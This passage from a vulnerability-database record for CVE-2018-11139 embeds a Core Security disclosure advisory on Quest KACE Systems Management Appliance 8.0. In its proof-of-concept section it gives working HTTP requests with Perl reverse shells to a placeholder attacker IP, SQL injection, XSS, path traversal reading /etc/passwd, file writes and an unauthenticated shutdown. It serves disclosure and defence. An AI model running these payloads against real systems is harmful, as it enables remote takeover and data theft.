"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11139",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10908",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11139",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11139",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-10908",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1215",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11139",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027/common/ajax_email_connection_test.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the script via the POST method. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. 
The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. 
*Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. 
\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11139",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10908",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11139",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"id": "VAR-201805-0599",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
}
]
},
"last_update_date": "2023-12-18T12:01:57.646000Z",
"patch": {
